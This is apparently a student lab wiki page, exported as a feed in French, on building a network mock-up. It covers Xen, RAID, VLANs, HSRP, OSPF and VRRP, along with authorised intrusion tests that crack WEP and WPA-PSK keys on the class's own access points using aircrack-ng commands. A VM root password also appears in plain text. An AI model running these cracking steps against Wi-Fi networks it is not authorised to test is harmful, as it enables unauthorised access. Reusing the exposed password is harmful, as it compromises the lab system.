   airodump-ng --encrypt wep wlan0mon &lt;br /&gt;
   Airodump-ng -w reseau_1.txt -c 2 --bssid 04:DA:D2:50:53 wlan0mon   (&amp;lt;== pour le réseau cracotte 3)&lt;br /&gt;
&lt;br /&gt;
Commence alors le craquage de la clef Wifi en Wep. On estime qu'il faut capturer plus ou moins 50 000 datas pour approximer 50% de chance de craquer la clef.&lt;br /&gt;
Après 40 000 datas volées , on réussit à craquer la clef, il nous aura fallu environ '''14 minutes'''.&lt;br /&gt;
&lt;br /&gt;
    KEY FOUND! [BA:BE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44 ]&lt;br /&gt;
    Decrypted correctly : 100%&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WPA-PSK ===&lt;br /&gt;
De même que précedemment, on recommence en changeant le --encrypt et on obtient :&lt;br /&gt;
   airmon-ng&lt;br /&gt;
   airmong-ng start wlan0mon&lt;br /&gt;
   airodump-ng --encrypt wpa wlan0mon &lt;br /&gt;
On obtient les informations suivantes sur notre réseau cible : &lt;br /&gt;
Channel: 2&lt;br /&gt;
SSIDName: kracotte03&lt;br /&gt;
BSSIDAdress: 04:DA:D2:9C:50:5A&lt;br /&gt;
&lt;br /&gt;
On peut alors espionner et voler des informations avec les '''handshakes''':&lt;br /&gt;
airodump-ng -w kracotte03 -c 2 --bssid 04:DA:D2:9C:50:5A&lt;br /&gt;
&lt;br /&gt;
'''-w kracotte03''' indique que l'on souhaite tout enregistrer dans un fichier nommé '''kracotte03.'''. On obtient alors après un moment les datas volées et les informations sont extraites sous plusieurs formats. &lt;br /&gt;
Le format '''.cap''' est compatible avec l'utilitaire que nous allons utiliser, on le copie donc sur une clef USB et on va cracker la clef sur une zabeth (vitesse de calcul plus elevée).&lt;br /&gt;
Pour se faire , on construit un dictionnaire (ensemble possible de toutes les combinaisons) avec l'utilitaire Crunch via la commande :&lt;br /&gt;
   crunch 8 8 123456789 &amp;gt;&amp;gt; Dico.txt &lt;br /&gt;
Notre dictionnaire est largement simplifié car nous sommes au courant qu'il s'agit d'un ensemble de 8 chiffres de 1 a 9 , ce qui permet de préciser à crunch une taille min et max de 8 et les caractères admissibles de 1 à 9&lt;br /&gt;
Le dictionnaire est maintenant prêt, on lance alors le cassage de clef par force brute :&lt;br /&gt;
aircrack-ng psk-01.cap -w Dico.txt&lt;br /&gt;
&lt;br /&gt;
== Securisation d'un réseau Wi-Fi ==&lt;br /&gt;
=== Sécurisation de données ===&lt;br /&gt;
Nous commencons par créer un RAID5 comme demandé dans la partie 6.1 du sujet. Pour se faire on commence par créer 3 disques de 1Go chacun:&lt;br /&gt;
   root@cordouan:~# lvcreate -L1G -n ima2a5-rex4ever-disk1 virtual&lt;br /&gt;
   root@cordouan:~# lvcreate -L1G -n ima2a5-rex4ever-disk2 virtual&lt;br /&gt;
   root@cordouan:~# lvcreate -L1G -n ima2a5-rex4ever-disk3 virtual&lt;br /&gt;
On éteint la machine et on recommence la même manipulation que pour la partie 3.5.1 du wiki pour attacher disk1,disk2 et disk3.&lt;br /&gt;
Nos 3 disques sont maintenant reliées à notre machine comme on le peut voir avec la commande '''fdisk -l'''&lt;br /&gt;
&lt;br /&gt;
   Disk /dev/xvdb3: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
   &lt;br /&gt;
   Disk /dev/xvdb4: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
&lt;br /&gt;
   Disk /dev/xvdb5: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
&lt;br /&gt;
== Architecture Réseau ==&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, vous trouverez comment nous avons configuré les routeurs ainsi que les commutateurs qui se trouve dans les salles E304 et E306.&lt;br /&gt;
&lt;br /&gt;
=== Configuration des 2 commutateurs ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au commutateur, nous avons utilisé minicom avec un cable série directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le '''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Voici quelque commandes de base qui nous ont servi pour la configuration des commutateurs&lt;br /&gt;
&lt;br /&gt;
    enable           // passage en admin pour pouvoir accéder aux données du commutateur&lt;br /&gt;
    write            // Sauvegarde de la configuration et l’implanter dans le commutateur&lt;br /&gt;
    show interface status OU sh int status  // Montre l'état de toutes les interfaces présentes sur le commutateur ainsi que les données associées&lt;br /&gt;
    configuration terminal    // permets d'accéder aux interfaces et ainsi pouvoir les modifier&lt;br /&gt;
    exit             // permets de sortir du configurateur actuel (par exemple sortir de l'interface)&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports du commutateur =====&lt;br /&gt;
&lt;br /&gt;
Nous avons 4 connexions qui sont dirigées vers le commutateur de la salle E304 ainsi que celui en E306&lt;br /&gt;
 - Un lien vers le routeur&lt;br /&gt;
 - Un lien vers la borne wifi&lt;br /&gt;
 - Un lien vers Corduan&lt;br /&gt;
 - Un lien vers l'autre commutateur&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Connexion !! E304 !! E306&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Corduan&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Borne Wifi&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Commutateur&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Router&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour la borne wifi =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    //Rendre accessible la modification du port&lt;br /&gt;
    switchport trunk encapsulation dot1q   //Encapsule avec la trame le numéro du Vlan associé, ce qui permettra de d'avoir de quel équipement viens le paquet ainsi la réponse sera dirigé vers le bon port&lt;br /&gt;
    switchport mode trunk   //Configure le port du switch en mode trunk, ce qui permets de ne pas avoir de restriction sur les Vlan, tous les Vlan peuvent passer à travers ce port&lt;br /&gt;
    no shut    //Démarre le port ou de le garder actif&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour Corduan =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal&lt;br /&gt;
    interface XXXX&lt;br /&gt;
    switchport&lt;br /&gt;
    switchport mode access //Rendre modifiable le port&lt;br /&gt;
    switchport access vlan42 //Autoriser le vlan 42 à transister à travers ce port&lt;br /&gt;
    no shutdown&lt;br /&gt;
    exit&lt;br /&gt;
    exit &lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour le router =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    &lt;br /&gt;
    switchport trunk encapsulation dot1q   &lt;br /&gt;
    switchport mode trunk  &lt;br /&gt;
    no shut    &lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour l'autre commutateur =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    &lt;br /&gt;
    switchport trunk encapsulation dot1q   &lt;br /&gt;
    switchport mode trunk  &lt;br /&gt;
    no shut    &lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création des Vlan =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 42&lt;br /&gt;
    name Corduan&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 2 à 7&lt;br /&gt;
    name groupe 1 à 6&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 130&lt;br /&gt;
    name interconnexion&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
Pour supprimer un vlan il suffit de faire :&lt;br /&gt;
    no vlan X&lt;br /&gt;
&lt;br /&gt;
=== Configuration du router E304 ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyACM0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Ce sont exactement les mêmes que celles utilisées pour les commutateurs&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
======  Vers les commutateurs ======&lt;br /&gt;
&lt;br /&gt;
La configuration est la même pour les 2 ports correspondant aux commutateurs&lt;br /&gt;
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexion&lt;br /&gt;
&lt;br /&gt;
  enable                                                  &lt;br /&gt;
 &lt;br /&gt;
  configure terminal&lt;br /&gt;
 &lt;br /&gt;
  interface XXXX                         &lt;br /&gt;
  no ip address                            //Pas d'addresse IP associé&lt;br /&gt;
  negotiation auto                         //Détermine automatiquement la vitesse de transfert&lt;br /&gt;
  media-type RJ45                          //Type de connexion (ici RJ45)&lt;br /&gt;
&lt;br /&gt;
Voici les vlan associé à nos groupes :&lt;br /&gt;
 &lt;br /&gt;
  service instance 2 ethernet              // création d'un vlan 2 dans cette interface&lt;br /&gt;
  encapsulation dot1q 2                    // Permets d'assurer une continuité d'un VLAN issue d'un switch sur un routeur via un lien trunk&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric      // retire le tag du vlan &lt;br /&gt;
  bridge-domain 2                          //création d'un bridge domaine interface (BDI) attribué au chiffre 2&lt;br /&gt;
    &lt;br /&gt;
  service instance 3 ethernet&lt;br /&gt;
  encapsulation dot1q 3&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 3&lt;br /&gt;
    &lt;br /&gt;
  service instance 4 ethernet&lt;br /&gt;
  encapsulation dot1q 4&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 4&lt;br /&gt;
  &lt;br /&gt;
  service instance 5 ethernet&lt;br /&gt;
  encapsulation dot1q 5&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 5&lt;br /&gt;
    &lt;br /&gt;
  service instance 6 ethernet&lt;br /&gt;
  encapsulation dot1q 6&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 6&lt;br /&gt;
  &lt;br /&gt;
  service instance 7 ethernet&lt;br /&gt;
  encapsulation dot1q 7&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 7&lt;br /&gt;
&lt;br /&gt;
Voici le vlan associé à l'interconnexion :&lt;br /&gt;
 &lt;br /&gt;
  service instance 42 ethernet&lt;br /&gt;
  encapsulation dot1q 42&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 42&lt;br /&gt;
&lt;br /&gt;
======  Vers le SR 32 ======&lt;br /&gt;
  interface XXXX                        &lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  service instance 130 ethernet&lt;br /&gt;
  encapsulation dot1q 130&lt;br /&gt;
  bridge-domain 130&lt;br /&gt;
   &lt;br /&gt;
&lt;br /&gt;
===== Configuration des BDI =====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   interface BDI2&lt;br /&gt;
   ip address 10.60.1.254 255.255.255.000           //Attribut l'addresse IPV4 pour le routeur ainsi que son mask&lt;br /&gt;
   standby version 2                                //Activation du HSRP (Host service Routing protocole) version 2 plus stable que la 1&lt;br /&gt;
   standby 3 ip 10.60.1.252                       //Donne l'addresse  IPV4 du routeur virtuelle pour le HSRP                             &lt;br /&gt;
   standby 3 preempt                              // Activation du HSRP         &lt;br /&gt;
   ipv6 address 2001:660:4401:60B3::/64 eui-64      //Attribut l'addresse IPV6                             &lt;br /&gt;
   ipv6 enable                                      //Active l'addressage IPV6                              &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900  //Donner un préfixe IPV6 à chaque machine                              &lt;br /&gt;
   ipv6 nd router-preference high                    //IPV6 sera la route de préférence par défaut avec une forte probabilitée&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI3&lt;br /&gt;
   ip address 10.60.2.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 3 ip 10.60.2.252                                                     &lt;br /&gt;
   standby 3 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B3::/64 eui-64                                   &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit                       &lt;br /&gt;
   &lt;br /&gt;
   interface BDI4&lt;br /&gt;
   ip address 10.60.3.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 4 ip 10.60.3.252                                                     &lt;br /&gt;
   standby 4 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B4::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B4::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                   &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI5&lt;br /&gt;
   ip address 10.60.4.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 5 ip 10.60.4.252                                                    &lt;br /&gt;
   standby 5 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B5::/64 eui-64                                   &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B5::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                   &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI6&lt;br /&gt;
   ip address 10.60.5.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.5.252                                                      &lt;br /&gt;
   standby 6 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B6::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B6::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit  &lt;br /&gt;
   &lt;br /&gt;
   interface BDI7&lt;br /&gt;
   ip address 10.60.6.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.6.252                                                      &lt;br /&gt;
   standby 6 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B7::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B7::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit                                 &lt;br /&gt;
 &lt;br /&gt;
   interface BDI42&lt;br /&gt;
   ip address 193.48.57.173 255.255.255.240         &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 7 ip 193.48.57.172                                                     &lt;br /&gt;
   standby 7 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B1::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B1::/64 1000 900                               &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI130&lt;br /&gt;
   ip address 192.168.222.1 255.255.255.248                      &lt;br /&gt;
   ipv6 address FE80::42:2 link-local                                         &lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   &lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV4 ====&lt;br /&gt;
&lt;br /&gt;
Se le faire expliquer parce que rien compris &lt;br /&gt;
&lt;br /&gt;
   configure terminal&lt;br /&gt;
   router ospf 1        //création d'un opsf (Open Shortest Path First)                                      &lt;br /&gt;
   router-id 10.60.0.1   //Doute voir avec Redon !&lt;br /&gt;
   log-adjacency-changes&lt;br /&gt;
   summary address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé&lt;br /&gt;
   summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé&lt;br /&gt;
   redistribute connected subnets&lt;br /&gt;
   network 192.168.222.8 0.0.0.7 area 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV6 ====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   ipv6 router rip tpima2a5                 //Création d'une route IPV6 sous le nom tpima2a5&lt;br /&gt;
   redistribute connected metric 1&lt;br /&gt;
   redistribute rip 1 metric 1&lt;br /&gt;
   redistribute static metric 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation du réseau ====&lt;br /&gt;
&lt;br /&gt;
Question pour Redon addresse Ip à définir &lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   int XXXX&lt;br /&gt;
   ip address 10.10.10.2 255.255.255.0&lt;br /&gt;
   vrrp 1 ip 10.10.10.3                     &lt;br /&gt;
   vrrp 1 preempt                          //Activation de la préemption, si jamais le routeur tombe en panne, l'autre prend sa place&lt;br /&gt;
   vrrp 1 priority 100                     //Dans le vvrp n°1 on définit la priorité à 100, plus la priorité est élevé plus il sera sollicité&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Configuration du router E306 ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Ce sont exactement les mêmes que celles utilisées pour les commutateurs&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
======  Vers les commutateurs ======&lt;br /&gt;
&lt;br /&gt;
La configuration est la même pour les 2 ports correspondant aux commutateurs&lt;br /&gt;
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexio&lt;br /&gt;
&lt;br /&gt;
*******************************************************************************&lt;br /&gt;
&lt;br /&gt;
*******************************************************************************&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV4 ====&lt;br /&gt;
&lt;br /&gt;
Se le faire expliquer parce que rien compris &lt;br /&gt;
&lt;br /&gt;
   configure terminal&lt;br /&gt;
   router ospf 1        //création d'un opsf (Open Shortest Path First)                                      &lt;br /&gt;
   router-id 10.60.0.1   //Doute voir avec Redon !&lt;br /&gt;
   log-adjacency-changes&lt;br /&gt;
   summary address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé&lt;br /&gt;
   summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé&lt;br /&gt;
   redistribute connected subnets&lt;br /&gt;
   network 192.168.222.8 0.0.0.7 area 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV6 ====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   ipv6 router rip tpima2a5                 //Création d'une route IPV6 sous le nom tpima2a5&lt;br /&gt;
   redistribute connected metric 1&lt;br /&gt;
   redistribute rip 1 metric 1&lt;br /&gt;
   redistribute static metric 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;/div&gt;</summary>
		<author><name>Pcoint</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2019/2020_G3&amp;diff=51244</id>
		<title>TP sysres IMA2a5 2019/2020 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2019/2020_G3&amp;diff=51244"/>
				<updated>2019-11-28T09:33:32Z</updated>
		
		<summary type="html">&lt;p&gt;Pcoint : /* Utilisation de AirCrack pour clef WPA-PSK */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Fichier:Rex4ever.PNG|500px|right|frameless|© Copyright Ginette]]&lt;br /&gt;
== Accueil/Descriptif du groupe ==&lt;br /&gt;
Bienvenue sur la page du groupe 3. Le découpage en groupe par numéro permet de se repérer plus facilement dans l'adressage des différents réseaux nécessaire.Ce groupe est constitué de :&lt;br /&gt;
&lt;br /&gt;
*Pascal Coint&lt;br /&gt;
*Quentin Weisbecker&lt;br /&gt;
&lt;br /&gt;
Ce TP consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système nous avons à installer une machine virtuelle Xen avec l'OS Devian ainsi qu'implanter un auto-commutateur et un point d'accès. Nous effectuerons pas la suite des tests d'intrusion sur ces points d'accès afin de voir la vulnérabilité des différents protocoles de clé. Pour notre cas, nous nous étendrons sur les protocoles [https://fr.wikipedia.org/wiki/Wired_Equivalent_Privacy WEP] et [https://fr.wikipedia.org/wiki/Wi-Fi_Protected_Access WPA]-PSK.&lt;br /&gt;
&lt;br /&gt;
== Informations importantes == &lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 35%;margin: auto;&amp;quot;&lt;br /&gt;
! Description !! Détails&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|ID VLAN&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|4&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V4&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|10.60.3.0/24 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V6&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|2001:660:4401:60B3::/64&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Nom de l'ordinateur portable&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Requin&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Repérage à l'étiqueteuse&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|IMA2A5 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Numéro de poste&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Zabeth03&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== La machine Virtuelle sous XEN : ima2a5-rex4ever ==&lt;br /&gt;
=== Note importante ===&lt;br /&gt;
Comme indiqué dans le sujet, nous allons créer une machine virtuelle via l'utilitaire [https://wiki.xenproject.org/wiki/Xen_Project_4.11_Man_Pages Xen] Linux sur le '''dom0 cordouan.insecserv.deule.net''' via la commande '''ssh''' et le compte administrateur usuel.Sur notre machine virtuelle nous créerons par la suite un compte pifou et un compte root identique au Zabeth.&lt;br /&gt;
&lt;br /&gt;
      Installation Summary&lt;br /&gt;
      ---------------------&lt;br /&gt;
      Hostname        :  ima2a5-rex4ever&lt;br /&gt;
      Distribution    :  ascii&lt;br /&gt;
      MAC Address     :  xxxxxxxxxxx&lt;br /&gt;
      IP Address(es)  :  dynamic&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (DSA)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (ECDSA)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (ED25519)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (RSA)&lt;br /&gt;
      Root Password   :  sZzrYYPFZEwxsfmFghddGW5&lt;br /&gt;
&lt;br /&gt;
=== Création de notre machine virtuelle XEN ===&lt;br /&gt;
Après s'être connecté, il faut maintenant creer la machine virtuelle :      &lt;br /&gt;
      xen-create-image --hostname=ima2a5-rex4ever --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --mirror=http://fr.deb.devuan.org/merged/ --force&lt;br /&gt;
L'installation se lance alors :&lt;br /&gt;
&lt;br /&gt;
      root@cordouan:~# xen-create-image --hostname=ima2a5-rex4ever --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --mirror=http://fr.deb.devuan.org/merged/ --force&lt;br /&gt;
      Use of uninitialized value within %DIST in pattern match (m//) at /usr/bin/xen-create-image line 1803.&lt;br /&gt;
      &lt;br /&gt;
      General Information&lt;br /&gt;
      --------------------&lt;br /&gt;
      Hostname       :  ima2a5-rex4ever&lt;br /&gt;
      Distribution   :  ascii&lt;br /&gt;
      Mirror         :  http://fr.deb.devuan.org/merged/&lt;br /&gt;
      Partitions     :  swap            512M  (swap)&lt;br /&gt;
                        /               4G    (ext4)&lt;br /&gt;
      Image type     :  sparse&lt;br /&gt;
      Memory size    :  256M&lt;br /&gt;
      Kernel path    :  /boot/vmlinuz-4.9.0-6-amd64&lt;br /&gt;
      Initrd path    :  /boot/initrd.img-4.9.0-6-amd64&lt;br /&gt;
      &lt;br /&gt;
      Networking Information&lt;br /&gt;
      ----------------------&lt;br /&gt;
      IP Address     : DHCP [MAC: xxxxxxx]&lt;br /&gt;
      &lt;br /&gt;
      &lt;br /&gt;
      Creating partition image: /usr/local/xen/domains/ima2a5-rex4ever/swap.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating swap on /usr/local/xen/domains/ima2a5-rex4ever/swap.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating partition image: /usr/local/xen/domains/ima2a5-rex4ever/disk.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating ext4 filesystem on /usr/local/xen/domains/ima2a5-rex4ever/disk.img&lt;br /&gt;
